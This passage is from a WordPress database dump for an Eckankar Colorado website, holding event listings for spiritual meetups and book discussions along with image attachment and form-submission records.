Holy Spirit during the day?</span></strong></span><br />\r\n<br />\r\n<span style=\"color: #666666;\"><strong><span style=\"font-size: 16pt;\">-Are you ready to connect with the creative, life-giving currents of your being?</span></strong></span></p>\r\n<p style=\"padding-left: 30px; font-size: 14pt;\">“<em>The Holy Spirit, which is the Voice of God, is always working on your behalf to help you unfold spiritually, to become a better, more loving human being.</em>”</p>\r\n<p style=\"padding-left: 30px; font-size: 14pt;\">“<em>The Holy Spirit, which is the Voice of God, is always working on your behalf to help you unfold spiritually, to become a better, more loving human being.</em>”</p>\r\n<p style=\"padding-left: 30px; font-size: 14pt;\">“<em>The ECK (another word for Holy Spirit) works in subtle ways. If there is something you need to know, you have to be of a mind to ask. Then you need the consciousness or awareness to know how the Holy Spirit speaks to you.</em>”</p>\r\n<p><span style=\"padding-left: 30px; font-size: 13pt;\">Quotes by Harold Klemp from the \'<em>Spiritual Wisdom Journal</em>\' referenced below.</span></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt;\">You can experience more love and joy in your life. There are spiritual exercises to try on your own to connect with the uplifting guidance the Holy Spirit is sending to you. This lifetime is your opportunity to discover the messages in dreams, to use your creative imagination, and to recognize the nudges spirit is sending you. Daily there are opportunities to connect with the life-giving currents of the light and sound.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Join others for a lively, online discussion of the times divine guidance has brought love, harmony and balance to them. Hear how they keep focused spiritually and recognize the wonders hidden in their day. All are welcome to share ideas, ask questions or listen while others speak of their own spiritual adventure.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">During the discussion you will have the opportunity to participate in a spiritual exercise, the HU, a love song to God. Singing HU a few times is a quick way to keep focused spiritually.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Spiritual Wisdom Journal titled, “How to Keep Focused Spiritually” includes a playful spiritual exercise that you can try to quiet the mind, tips to focus spiritually, and personal stories of communication from God. This free publication can be viewed or downloaded at: </span><span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.spiritualwisdomjournal.org/Archives/swj_jul2021.pdf\" href=\"https://www.spiritualwisdomjournal.org/Archives/swj_jul2021.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Wisdom Journal</a></span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/280002226/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'How to Keep Focused Spiritually\'','','publish','closed','closed','','631-870','','','2021-08-09 08:56:59','2021-08-09 14:56:59','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265267',0,'mec-events','',0),(265269,2,'2021-08-09 08:59:26','2021-08-09 14:59:26','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 16pt;\">-Have you ever felt spirit was guiding you?</span></strong></span><br />\r\n<br />\r\n<span style=\"color: #666666;\"><strong><span style=\"font-size: 16pt;\">-Do you want to be more focused on the uplifting presence of the Holy Spirit during the day?</span></strong></span><br />\r\n<br />\r\n<span style=\"color: #666666;\"><strong><span style=\"font-size: 16pt;\">-Are you ready to connect with the creative, life-giving currents of your being?</span></strong></span></p>\r\n<p style=\"padding-left: 30px; font-size: 14pt;\">“<em>The Holy Spirit, which is the Voice of God, is always working on your behalf to help you unfold spiritually, to become a better, more loving human being.</em>”</p>\r\n<p style=\"padding-left: 30px; font-size: 14pt;\">“<em>The Holy Spirit, which is the Voice of God, is always working on your behalf to help you unfold spiritually, to become a better, more loving human being.</em>”</p>\r\n<p style=\"padding-left: 30px; font-size: 14pt;\">“<em>The ECK (another word for Holy Spirit) works in subtle ways. If there is something you need to know, you have to be of a mind to ask. Then you need the consciousness or awareness to know how the Holy Spirit speaks to you.</em>”</p>\r\n<p><span style=\"padding-left: 30px; font-size: 13pt;\">Quotes by Harold Klemp from the \'<em>Spiritual Wisdom Journal</em>\' referenced below.</span></p>\r\n<p><br />\r\n<span style=\"font-size: 14pt;\">You can experience more love and joy in your life. There are spiritual exercises to try on your own to connect with the uplifting guidance the Holy Spirit is sending to you. This lifetime is your opportunity to discover the messages in dreams, to use your creative imagination, and to recognize the nudges spirit is sending you. Daily there are opportunities to connect with the life-giving currents of the light and sound.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Join others for a lively, online discussion of the times divine guidance has brought love, harmony and balance to them. Hear how they keep focused spiritually and recognize the wonders hidden in their day. All are welcome to share ideas, ask questions or listen while others speak of their own spiritual adventure.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">During the discussion you will have the opportunity to participate in a spiritual exercise, the HU, a love song to God. Singing HU a few times is a quick way to keep focused spiritually.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">This event is sponsored by ECKANKAR, the Path of Spiritual Freedom, as a community service for people of all faiths and beliefs.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">The Spiritual Wisdom Journal titled, “How to Keep Focused Spiritually” includes a playful spiritual exercise that you can try to quiet the mind, tips to focus spiritually, and personal stories of communication from God. This free publication can be viewed or downloaded at: </span><span style=\"font-size: 14pt;\"><a class=\"link\" title=\"https://www.spiritualwisdomjournal.org/Archives/swj_jul2021.pdf\" href=\"https://www.spiritualwisdomjournal.org/Archives/swj_jul2021.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Spiritual Wisdom Journal</a></span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofDenver/events/280002290/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup - \'How to Keep Focused Spiritually\'','','publish','closed','closed','','631-870-668','','','2021-08-09 09:11:23','2021-08-09 15:11:23','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265269',0,'mec-events','',0),(265274,2,'2021-08-12 13:36:10','2021-08-12 19:36:10','','footer-8-12-2021-2','','inherit','closed','closed','','footer-8-12-2021-2','','','2021-08-12 13:36:10','2021-08-12 19:36:10','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/footer-8-12-2021-2.png',0,'attachment','image/png',0),(265277,2,'2021-08-12 14:54:23','2021-08-12 20:54:23','','ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1','','inherit','closed','closed','','ixlibrb-0-3-5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1','','','2021-08-12 14:54:23','2021-08-12 20:54:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1.jpg',0,'attachment','image/jpeg',0),(265279,2,'2021-08-12 14:57:23','2021-08-12 20:57:23','','ESC-OCT-2021-divine creativity-1','','inherit','closed','closed','','esc-oct-2021-divine-creativity-1','','','2021-08-12 14:57:23','2021-08-12 20:57:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ESC-OCT-2021-divine-creativity-1.jpg',0,'attachment','image/jpeg',0),(265285,2,'2021-08-13 10:46:44','2021-08-13 16:46:44','','ESC-OCT-2021-divine creativity-2','','inherit','closed','closed','','esc-oct-2021-divine-creativity-2','','','2021-08-13 10:46:44','2021-08-13 16:46:44','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ESC-OCT-2021-divine-creativity-2.jpg',0,'attachment','image/jpeg',0),(265294,2,'2021-08-13 11:19:39','2021-08-13 17:19:39','','ESC-OCT-2021-divine creativity-5','','inherit','closed','closed','','esc-oct-2021-divine-creativity-5','','','2021-08-13 11:19:39','2021-08-13 17:19:39','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ESC-OCT-2021-divine-creativity-5.jpg',0,'attachment','image/jpeg',0),(265296,2,'2021-08-13 11:24:23','2021-08-13 17:24:23','','ESC-OCT-2021-divine creativity-6','','inherit','closed','closed','','esc-oct-2021-divine-creativity-6','','','2021-08-13 11:24:23','2021-08-13 17:24:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ESC-OCT-2021-divine-creativity-6.jpg',0,'attachment','image/jpeg',0),(265301,2,'2021-08-13 11:32:09','2021-08-13 17:32:09','','ESC-OCT-2021-divine creativity-7','','inherit','closed','closed','','esc-oct-2021-divine-creativity-7','','','2021-08-13 11:32:09','2021-08-13 17:32:09','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ESC-OCT-2021-divine-creativity-7.jpg',0,'attachment','image/jpeg',0),(265303,2,'2021-08-13 11:34:53','2021-08-13 17:34:53','','ESC-OCT-2021-divine creativity-8','','inherit','closed','closed','','esc-oct-2021-divine-creativity-8','','','2021-08-13 11:34:53','2021-08-13 17:34:53','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ESC-OCT-2021-divine-creativity-8.jpg',0,'attachment','image/jpeg',0),(265324,2,'2021-08-13 12:11:11','2021-08-13 18:11:11','','ESC-OCT-2021-divine creativity-9','','inherit','closed','closed','','esc-oct-2021-divine-creativity-9','','','2021-08-13 12:11:11','2021-08-13 18:11:11','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ESC-OCT-2021-divine-creativity-9.jpg',0,'attachment','image/jpeg',0),(265336,0,'2021-08-15 09:14:25','2021-08-15 15:14:25','','','','publish','closed','closed','','265336','','','2021-08-15 09:14:25','2021-08-15 15:14:25','',0,'https://eckankar-colorado.org/nf_sub/265336/',0,'nf_sub','',0),(265344,2,'2021-08-16 10:15:06','2021-08-16 16:15:06','','ESC-OCT-2021-divine creativity-10','','inherit','closed','closed','','esc-oct-2021-divine-creativity-10','','','2021-08-16 10:15:06','2021-08-16 16:15:06','',7160,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ESC-OCT-2021-divine-creativity-10.jpg',0,'attachment','image/jpeg',0),(265347,2,'2021-08-16 10:18:17','2021-08-16 16:18:17','','ESC-OCT-2021-divine creativity-11','','inherit','closed','closed','','esc-oct-2021-divine-creativity-11','','','2021-08-16 10:18:17','2021-08-16 16:18:17','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/ESC-OCT-2021-divine-creativity-11.jpg',0,'attachment','image/jpeg',0),(265361,2,'2021-08-16 13:39:00','2021-08-16 19:39:00','','elss-bkgnd-2','','inherit','closed','closed','','elss-bkgnd-2','','','2021-08-16 13:39:00','2021-08-16 19:39:00','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/elss-bkgnd-2.jpg',0,'attachment','image/jpeg',0),(265363,2,'2021-08-16 13:58:35','2021-08-16 19:58:35','','elss-child-flowers-2','','inherit','closed','closed','','elss-child-flowers-2','','','2021-08-16 13:58:35','2021-08-16 19:58:35','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/elss-child-flowers-2.jpg',0,'attachment','image/jpeg',0),(265364,2,'2021-08-16 15:29:35','2021-08-16 21:29:35','','elss-boat-1','','inherit','closed','closed','','elss-boat-1','','','2021-08-16 15:29:35','2021-08-16 21:29:35','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/elss-boat-1.jpg',0,'attachment','image/jpeg',0),(265425,2,'2022-02-17 20:47:45','2022-02-18 03:47:45','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">agline Goes Here</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.<br>\r\n</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-durango/events/292097255/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','SOUND OF SOUL IN PERSON TEMPLATE-CAN USE MEETUP LINK FOR THIS ONE | Benefit Title Goes Here','','draft','closed','closed','','sound-of-soul-zoom-online-template-mec-805','','','2023-08-31 12:43:46','2023-08-31 18:43:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265425',0,'mec-events','',0),(265426,2,'2021-08-27 19:17:43','2021-08-28 01:17:43','<p><span style=\"font-size: 20pt; color: #333333;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p><span style=\"color: #333333; font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #333333; font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #333333;\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\"><em>*Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<!-- REGISTER BUTTON CODE --><!--\r\n\r\n\r\n\r\n<p><a class=\"reg3Button sg-popup-id-264853\" style=\"color: #685454 !important;\" href=\"#\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n\r\n\r\n\r\n--><!-- END REGISTER BUTTON CODE -->','Sound of Soul -- In-Person Event','','publish','closed','closed','','sound-of-soul-zoom-online-template-mec-805-744','','','2021-08-27 19:33:35','2021-08-28 01:33:35','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265426',0,'mec-events','',0),(269187,0,'2023-10-09 22:27:33','2023-10-10 04:27:33','','','','publish','closed','closed','','269187','','','2023-10-09 22:27:33','2023-10-10 04:27:33','',0,'https://eckankar-colorado.org/nf_sub/269187/',0,'nf_sub','',0),(269188,0,'2023-10-10 10:53:37','2023-10-10 16:53:37','','','','publish','closed','closed','','269188','','','2023-10-10 10:53:37','2023-10-10 16:53:37','',0,'https://eckankar-colorado.org/nf_sub/269188/',0,'nf_sub','',0),(269189,0,'2023-10-10 10:55:37','2023-10-10 16:55:37','','','','publish','closed','closed','','269189','','','2023-10-10 10:55:37','2023-10-10 16:55:37','',0,'https://eckankar-colorado.org/nf_sub/269189/',0,'nf_sub','',0),(269190,0,'2023-10-10 17:22:51','2023-10-10 23:22:51','','','','publish','closed','closed','','269190','','','2023-10-10 17:22:51','2023-10-10 23:22:51','',0,'https://eckankar-colorado.org/nf_sub/269190/',0,'nf_sub','',0),(269191,0,'2023-10-10 17:23:50','2023-10-10 23:23:50','','','','publish','closed','closed','','269191','','','2023-10-10 17:23:50','2023-10-10 23:23:50','',0,'https://eckankar-colorado.org/nf_sub/269191/',0,'nf_sub','',0),(269224,0,'2023-10-18 16:24:58','2023-10-18 22:24:58','','','','publish','closed','closed','','269224','','','2023-10-18 16:24:58','2023-10-18 22:24:58','',0,'https://eckankar-colorado.org/nf_sub/269224/',0,'nf_sub','',0),(269193,0,'2023-10-10 19:06:25','2023-10-11 01:06:25','','','','publish','closed','closed','','269193','','','2023-10-10 19:06:25','2023-10-11 01:06:25','',0,'https://eckankar-colorado.org/nf_sub/269193/',0,'nf_sub','',0),(269194,0,'2023-10-11 04:45:48','2023-10-11 10:45:48','','','','publish','closed','closed','','269194','','','2023-10-11 04:45:48','2023-10-11 10:45:48','',0,'https://eckankar-colorado.org/nf_sub/269194/',0,'nf_sub','',0),(269195,0,'2023-10-11 08:04:06','2023-10-11 14:04:06','','','','publish','closed','closed','','269195','','','2023-10-11 08:04:06','2023-10-11 14:04:06','',0,'https://eckankar-colorado.org/nf_sub/269195/',0,'nf_sub','',0),(269196,0,'2023-10-11 13:09:04','2023-10-11 19:09:04','','','','publish','closed','closed','','269196','','','2023-10-11 13:09:04','2023-10-11 19:09:04','',0,'https://eckankar-colorado.org/nf_sub/269196/',0,'nf_sub','',0),(265432,2,'2021-08-29 12:53:32','2021-08-29 18:53:32','<p><span style=\"font-size: 14pt;\">Soul moves through the evolutionary process in a number of different forms, including those of animals and birds. These are some of the many different ways in which Soul gains experience, thereby gaining expression of Its divine self.</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">Have you ever ...</span></strong></p>\r\n<p style=\"padding-left: 40px;\"><em><span style=\"font-size: 14pt;\">• wanted to know if animals go to heaven?</span></em><br />\r\n<em><span style=\"font-size: 14pt;\">• felt a heart-to-heart connection with an animal?</span></em><br />\r\n<em><span style=\"font-size: 14pt;\">• grieved the loss of a pet?</span></em><br />\r\n<em><span style=\"font-size: 14pt;\">• had an amazing spiritual experience with a pet or an animal in nature?</span></em><br />\r\n<em><span style=\"font-size: 14pt;\">• felt that animals can teach us lessons about living life?</span></em></p>\r\n<p><span style=\"font-size: 14pt;\">The ‘Animals Are Soul Too!’ SEGA Meetup discussion offers inspiration, stories, tips, and spiritual exercises that will assist you to recognize your own individuality as Soul and to recognize that in others, be they human or animal.</span></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/280415978/?rv=ea1_v2&amp;_xtd=gatlbWFpbF9jbGlja9oAJDQzYWM2NDQyLTgzNzgtNDM3NC05MDM4LWQ4MjFkZDc4MzJiOA&amp;utm_campaign=event-announce&amp;utm_medium=email&amp;utm_source=promo\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>‘Animals Are Soul Too!’','','publish','closed','closed','','631-981','','','2021-08-29 13:20:57','2021-08-29 19:20:57','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265432',0,'mec-events','',0),(265434,2,'2021-08-29 13:08:30','2021-08-29 19:08:30','','animals-are-soul-2','','inherit','closed','closed','','animals-are-soul-2','','','2021-08-29 13:08:30','2021-08-29 19:08:30','',265432,'https://eckankar-colorado.org/wp-content/uploads/2021/08/animals-are-soul-2.jpg',0,'attachment','image/jpeg',0),(265436,2,'2021-08-29 13:47:50','2021-08-29 19:47:50','','Masonry View','','publish','closed','closed','','masonry-view-2','','','2023-06-06 22:08:01','2023-06-07 04:08:01','',0,'https://eckankar-colorado.org/?post_type=mec_calendars&#038;p=265436',0,'mec_calendars','',0),(265437,2,'2021-08-29 13:49:49','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 84px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>[MEC id=\"265436\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Masonry Event View --Working','','draft','closed','closed','','','','','2021-08-29 13:49:49','2021-08-29 19:49:49','',0,'https://eckankar-colorado.org/?page_id=265437',0,'page','',0),(265440,2,'2021-08-29 13:54:33','2021-08-29 19:54:33','','modern-prophet-lscape-2','','inherit','closed','closed','','modern-prophet-lscape-2','','','2021-08-29 13:54:33','2021-08-29 19:54:33','',265063,'https://eckankar-colorado.org/wp-content/uploads/2021/05/modern-prophet-lscape-2.jpg',0,'attachment','image/jpeg',0),(265441,2,'2021-08-29 14:55:02','2021-08-29 20:55:02','<p><span style=\"font-size: 14pt;\"><strong>-This Book Discussion Is Open To The Public-</strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Discover your own spiritual greatness. “Tucked away in the hidden places of this book are clues as to how you too may reach the glories of God,” says Sri Harold Klemp. </span></p>\r\n<p><span style=\"font-size: 14pt;\">Autobiography of a Modern Prophet is a special compilation of Sri Harold’s three autobiographical books—The Wind of Change, Soul Travelers of the Far Country, and Child in the Wilderness. He spent many hours writing new material, carefully weaving one, continuous story to help others climb the Mountain of God.</span></p>\r\n<p><span style=\"font-size: 14pt;\">Harold Klemp’s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 14pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life–there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God’s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-2234-0.html\">ECK Bookstore</a>.</span></p>\r\n<p><a class=\"reg3Button sg-popup-id-265067\" style=\"color: #685454 !important;\" href=\"#\" target=\"_blank\" rel=\"noopener noreferrer\">Register Today!</a></p>','Online Book Discussion - Autobiography of a Modern Prophet','','publish','closed','closed','','373-347','','','2022-03-02 08:10:20','2022-03-02 15:10:20','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265441',0,'mec-events','',0),(265446,2,'2021-08-29 15:10:36','2021-08-29 21:10:36','','','','publish','closed','closed','','265446','','','2021-08-29 15:10:36','2021-08-29 21:10:36','',0,'https://eckankar-colorado.org/nf_sub/265446/',0,'nf_sub','',0),(265447,2,'2021-08-29 15:13:20','2021-08-29 21:13:20','','','','publish','closed','closed','','265447','','','2021-08-29 15:13:20','2021-08-29 21:13:20','',0,'https://eckankar-colorado.org/nf_sub/265447/',0,'nf_sub','',0),(265448,2,'2021-08-29 15:27:50','2021-08-29 21:27:50','','','','publish','closed','closed','','265448','','','2021-08-29 15:27:50','2021-08-29 21:27:50','',0,'https://eckankar-colorado.org/nf_sub/265448/',0,'nf_sub','',0),(265449,2,'2021-08-29 15:31:22','2021-08-29 21:31:22','','','','publish','closed','closed','','265449','','','2021-08-29 15:31:22','2021-08-29 21:31:22','',0,'https://eckankar-colorado.org/nf_sub/265449/',0,'nf_sub','',0),(265450,2,'2021-08-29 15:34:24','2021-08-29 21:34:24','','','','publish','closed','closed','','265450','','','2021-08-29 15:34:24','2021-08-29 21:34:24','',0,'https://eckankar-colorado.org/nf_sub/265450/',0,'nf_sub','',0),(265458,0,'2021-08-31 08:59:15','2021-08-31 14:59:15','','','','publish','closed','closed','','265458','','','2021-08-31 08:59:15','2021-08-31 14:59:15','',0,'https://eckankar-colorado.org/nf_sub/265458/',0,'nf_sub','',0),(265538,2,'2021-08-31 20:18:01','2021-09-01 02:18:01','','butterfly-1','','inherit','closed','closed','','butterfly-1','','','2021-08-31 20:18:01','2021-09-01 02:18:01','',0,'https://eckankar-colorado.org/wp-content/uploads/2021/08/butterfly-1.jpg',0,'attachment','image/jpeg',0),(265539,2,'2021-09-03 08:55:02','2021-09-03 14:55:02','<p><span style=\"font-size: 15pt;\"><strong>In the great cycle of birth, life and death, many people are uncertain about what happens after our physical existence ceases.</strong></span></p>\r\n<p><span style=\"font-size: 15pt;\"><strong>Is there really such a thing as life after death?<br />\r\n</strong><strong>Can we gain experience of this journey of Soul—while still living in the physical world?</strong></span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Understanding more about our true spiritual nature and our spiritual experiences can provide personal proof of Soul\'s eternal nature, and can answer questions as to what lies beyond this life.</span><br />\r\n<br />\r\n<span style=\"font-size: 14pt;\">Come explore the eternal, divine wonder of you! Join us for this spiritual discussion to share your own insights, learn from those of others, and try a spiritual exercise or two.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This is the first of a 3-part discussion that digs deeper into the topic each time.  Join us even if you don’t attend the others. </span><br />\r\n<span style=\"font-size: 14pt;\"><a class=\"link\" title=\"http://meetup.com/SEGofAurora/events\" href=\"http://meetup.com/SEGofAurora/events\" target=\"_blank\" rel=\"noopener\">Spiritual Experiences Group of Aurora</a></span></p>\r\n<p><span style=\"font-size: 14pt;\"><strong>References:</strong></span><br />\r\n<span style=\"font-size: 14pt;\">We welcome you to explore these pages before the Meetup, and look forward to exchanging insights and experiences!</span><br />\r\n<span style=\"font-size: 14pt;\"><a href=\"https://www.amazon.com/Eck-Wisdom-Life-After-Death/dp/1570434387/ref=monarch_sidesheet\" target=\"_blank\" rel=\"noopener\">ECK Wisdom on Life after Death</a></span></p>\r\n<p><br />\r\n<a class=\"meetupreg\" href=\"https://www.meetup.com/SEGofAurora/events/280503726/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','Online Meetup<br>‘Life after Death’ Discussion','','publish','closed','closed','','631-440','','','2021-09-03 09:39:22','2021-09-03 15:39:22','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265539',0,'mec-events','',0),(265540,2,'2021-09-03 08:52:26','2021-09-03 14:52:26','','black-white-connection','','inherit','closed','closed','','black-white-connection','','','2021-09-03 08:52:26','2021-09-03 14:52:26','',265539,'https://eckankar-colorado.org/wp-content/uploads/2021/09/black-white-connection.jpg',0,'attachment','image/jpeg',0),(265547,0,'2021-09-05 21:34:45','2021-09-06 03:34:45','','','','publish','closed','closed','','265547','','','2021-09-05 21:34:45','2021-09-06 03:34:45','',0,'https://eckankar-colorado.org/nf_sub/265547/',0,'nf_sub','',0),(265548,0,'2021-09-06 06:31:42','2021-09-06 12:31:42','','','','publish','closed','closed','','265548','','','2021-09-06 06:31:42','2021-09-06 12:31:42','',0,'https://eckankar-colorado.org/nf_sub/265548/',0,'nf_sub','',0),(265555,2,'2021-09-08 12:31:18','2021-09-08 18:31:18','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever wondered if you have had past lives or feel like you have known someone for a long time even though you just met?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Are your dreams so jumbled that you feel you cannot understand them at all?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever felt there is more to life and wondered how to understand these feelings?</span></strong></span></p>\r\n<p><span style=\"font-size: 14pt;\">Join us for three one-hour book discussions on the topics of Past Lives and Reincarnation, Dreams, and Soul Travel. During these book discussions you will have the opportunity to share your experiences and ask questions about these topics.</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">* Learn ways to experience your past lives through dream recall.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Understand the purpose of reincarnation.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Find ways to understand your dreams.</span></strong><br />\r\n<strong><span style=\"font-size: 14pt;\">* Learn how to shift your consciousness or what is also known as Soul Travel.</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Books will be provided for free and there is no cost for the discussions.</span></p>\r\n<p><span style=\"font-size: 14pt;\">This discussion series is sponsored by ECKANKAR, the Path of Spiritual Freedom as a community service for all people and faiths.</span></p>\r\n<p><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p>*<em>Our current health regulations in Colorado do not require social distancing, face masks or vaccination to attend a large group activity; nor is Colorado Satsang requiring them. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It’s appreciated that by attending you are taking responsibility for your own health.</em></p>\r\n<p><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/wmjhpsyccmbdc/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>','In-Person Meetup - Pagosa Springs<br>\'Past Lives, Dreams, and Soul Travel\'-Book Discussion','','publish','closed','closed','','631-234','','','2021-09-12 23:22:40','2021-09-13 05:22:40','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=265555',0,'mec-events','',0),(265557,2,'2021-09-08 12:27:15','2021-09-08 18:27:15','','past lives-dreams-st-2','','inherit','closed','closed','','past-lives-dreams-st-2','','','2021-09-08 12:27:15','2021-09-08 18:27:15','',265555,'https://eckankar-colorado.org/wp-content/uploads/2021/09/past-lives-dreams-st-2.jpg',0,'attachment','image/jpeg',0),(265559,2,'2021-09-08 12:34:54','2021-09-08 18:34:54','<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever wondered if you have had past lives or feel like you have known someone for a long time even though you just met?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Are your dreams so jumbled that you feel you cannot understand them at all?</span></strong></span></p>\r\n<p><span style=\"color: #666666;\"><strong><span style=\"font-size: 14pt;\">Have you ever felt there is more to life and 